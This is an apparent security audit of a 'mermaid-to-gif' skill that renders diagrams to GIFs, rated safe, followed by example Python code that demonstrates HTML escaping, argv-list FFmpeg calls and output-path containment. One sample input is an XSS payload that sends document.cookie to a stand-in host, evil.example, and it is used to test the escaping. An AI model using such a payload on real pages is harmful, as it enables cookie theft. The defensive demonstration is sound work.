mermaid-to-gif

Pass

Audited by Gen Agent Trust Hub on Mar 17, 2026

Risk Level: SAFE
Full Analysis
  • [EXTERNAL_DOWNLOADS]: The script fetches the Mermaid.js library from the jsDelivr CDN (https://cdn.jsdelivr.net/npm/mermaid) while rendering in the headless browser. jsDelivr is a well-known and widely trusted content delivery network. The URL carries no version pin, so each run loads whatever Mermaid version the CDN currently serves.
  • [COMMAND_EXECUTION]: The script invokes the FFmpeg command-line tool through the subprocess module to generate a palette and assemble the GIF from the captured image frames. The FFmpeg arguments are passed as a list rather than a shell string, so user-controlled file names arrive as single argv entries and are never parsed by a shell, which prevents shell injection.
  • [SAFE]: The skill applies html.escape() to the user-provided Mermaid code before embedding it in the HTML template used for rendering. This keeps the diagram source from terminating its container element or injecting tags into the template, so the source cannot add script to the page. Mermaid parses the decoded text content of that element, so the features that securityLevel: 'loose' enables for advanced diagrams (HTML labels, click callbacks) take effect only inside the throwaway headless Playwright page, not in any user's browser.
  • [SAFE]: File operations are restricted to reading the input files specified by the user and writing to a local output directory or the system temporary directory.
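The three controls the audit credits (escaping the diagram source before templating, argv-list FFmpeg invocation, and output confined to a local directory) are shown together below as an added example. This is illustrative code written for this page, not the audited skill's source: the template, the frame naming (frame_%04d.png), the function names and the sample diagrams are all assumptions; only the CDN URL and the securityLevel setting come from the audit text. FFmpeg is not executed here; the functions return the argv lists so the shape of the call can be inspected.

```python
import html
import shlex
from pathlib import Path

# Constructed sample inputs (not taken from the audited skill).
# The second tries to close the diagram element and inject a <script> into the template.
SAMPLE_DIAGRAMS = {
    "benign": "graph TD\n  A[Start] --> B{Check}\n  B -->|yes| C[Done]",
    "hostile": 'graph TD\n  A["x"] --> B\n</pre><script>fetch("http://evil.example/?c=" + document.cookie)</script>',
}

# Illustrative template: the CDN URL and securityLevel are from the audit, the rest is assumed.
PAGE_TEMPLATE = """<!doctype html>
<html><body>
<pre class="mermaid">{diagram}</pre>
<script src="https://cdn.jsdelivr.net/npm/mermaid"></script>
<script>mermaid.initialize({{ startOnLoad: true, securityLevel: 'loose' }});</script>
</body></html>
"""
PRE_OPEN, PRE_CLOSE = '<pre class="mermaid">', "</pre>"


def build_page(diagram_src: str) -> str:
    """Embed user-supplied Mermaid source as text, never as markup.

    html.escape turns <, >, &, " and ' into entities, so the source cannot
    terminate the <pre> or add tags. The browser decodes the entities when it
    reads the element's text content, which is what Mermaid actually parses.
    """
    return PAGE_TEMPLATE.format(diagram=html.escape(diagram_src, quote=True))


def diagram_text_from_page(page: str) -> str:
    """What Mermaid will see: the decoded text content of the diagram element."""
    start = page.index(PRE_OPEN) + len(PRE_OPEN)
    end = page.index(PRE_CLOSE, start)
    return html.unescape(page[start:end])


def script_tag_count(page: str) -> int:
    """Only the template's own two <script> tags should ever be present."""
    return page.count("<script")


def contained_output_path(out_dir: str, name: str) -> Path:
    """Confine the GIF path to the output directory.

    Rejects traversal ("../x") and absolute names. Because the result is an
    absolute path, a name beginning with "-" can no longer be mistaken for an
    ffmpeg option either.
    """
    base = Path(out_dir).resolve()
    target = (base / name).resolve()
    if target == base or not target.is_relative_to(base):
        raise ValueError(f"output path escapes {base}: {name!r}")
    return target


def is_contained(out_dir: str, name: str) -> bool:
    """Boolean view of contained_output_path for callers that just want a check."""
    try:
        contained_output_path(out_dir, name)
        return True
    except ValueError:
        return False


def palette_cmd(frames_pattern: str, palette: Path, fps: int = 10) -> list[str]:
    """Pass 1: derive a palette from the captured frames (assumed frame_%04d.png naming)."""
    return ["ffmpeg", "-y", "-framerate", str(fps), "-i", frames_pattern,
            "-vf", "palettegen", str(palette)]


def gif_cmd(frames_pattern: str, palette: Path, out_gif: Path, fps: int = 10) -> list[str]:
    """Pass 2: assemble the GIF with that palette.

    The command is an argv list for subprocess.run(..., shell=False): every
    element, including a hostile filename, stays one argument and is never
    handed to a shell, so there is nothing for a shell metacharacter to do.
    """
    return ["ffmpeg", "-y", "-framerate", str(fps), "-i", frames_pattern,
            "-i", str(palette), "-filter_complex", "[0:v][1:v]paletteuse", str(out_gif)]


if __name__ == "__main__":
    page = build_page(SAMPLE_DIAGRAMS["hostile"])
    assert diagram_text_from_page(page) == SAMPLE_DIAGRAMS["hostile"]  # source survives intact
    assert script_tag_count(page) == 2                                 # no injected <script>
    out = contained_output_path("renders", "diagram.gif")
    # shlex.join only shows how the argv would look if it ever had to be quoted for a shell;
    # the real call would be subprocess.run(gif_cmd(...), check=True) with the list itself.
    print(shlex.join(gif_cmd("frames/frame_%04d.png", out.with_name("palette.png"), out)))
```

The two assertions in the main block capture the point of the escape: the hostile input neither adds a script tag to the page nor loses any characters on the way to Mermaid. The path check is the piece the audit's last finding implies but does not show; dropping it would let a user-chosen output name write outside the output directory.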
Audit Metadata
Risk Level: SAFE
Analyzed: Mar 17, 2026, 07:54 AM